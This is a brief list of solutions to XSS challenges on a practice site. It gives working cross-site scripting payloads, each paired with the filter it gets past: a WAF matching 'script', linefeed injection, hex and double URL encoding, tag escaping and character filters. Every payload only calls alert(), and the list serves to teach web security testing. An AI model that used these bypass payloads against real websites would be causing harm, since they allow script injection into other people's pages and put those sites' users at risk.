XSS Challanges from https://www.zixem.altervista.org/XSS
<svg/onload=alert()>
- WAF looking for "script"
<object data="javascRipt:alert()">
- %0A (LF = linefeed)
%0A<svg/onload=alert()>
- Inline html
x' onerror=javascript:alert()//
- param reflected in form post field (action)
XSS&action=javascript:alert(1337)
- Hex encodin \x
\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x29
- Double urlencodeing
%253Csvg%2520onload%253Dalert%2528%2529%253E
- Escape the html tag with
</p>
</p><svg/onload=alert()>
- Filters
(
');alert`1`;//
');/**/onerror=alert`1`//
');window[`alert`]`xss`//;